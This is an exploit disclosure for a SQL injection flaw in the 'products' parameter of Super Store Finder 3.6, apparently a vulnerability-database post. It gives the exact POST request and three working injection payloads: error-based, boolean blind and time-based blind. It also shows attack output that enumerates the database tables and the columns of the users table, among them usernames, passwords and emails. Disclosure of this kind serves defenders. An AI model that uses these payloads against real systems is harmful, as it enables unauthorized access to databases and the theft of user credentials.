Super Store Finder version 3.6 suffers from a remote SQL injection vulnerability.
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Vulnerability ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : https://codecanyon.net/item/super-store-finder/3630922 │
│ Vendor : Super Store Finder │
│ Software : Super Store Finder 3.6 │
│ Vuln Type: SQL Injection │
│ Impact : Database Access │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ │
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │
│ data and crash the application or make it unavailable, leading to lost revenue and │
│ damage to a company's reputation. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2023 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Path: /index.php
---------------------------------------------------------------------------------
POST /products/superstorefinder/index.php HTTP/1.1
ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347[SQLI]
---------------------------------------------------------------------------------
POST parameter 'products' is vulnerable to SQL Injection
---
Parameter: products (POST)
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347' AND GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44),1337)-- wXyW
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347' AND 04872=4872-- wXyW
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (IF - comment)
Payload: ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347'XOR(IF(now()=sysdate(),SLEEP(6),0))XOR'Z
---
[+] Starting the Attack
fetching current database
current database: 'superstor_***'
fetching tables
[8 tables]
+--------------+
| categories_b |
| categories |
| stores_c |
| categories_c |
| stores_b |
| users_b |
| users |
| stores |
+--------------+
fetching columns for table 'users'
[11 columns]
+-------------+
| id |
| username |
| password |
| firstname |
| lastname |
| facebook_id |
| address |
| email |
| created |
| modified |
| status |
+-------------+
[-] Done
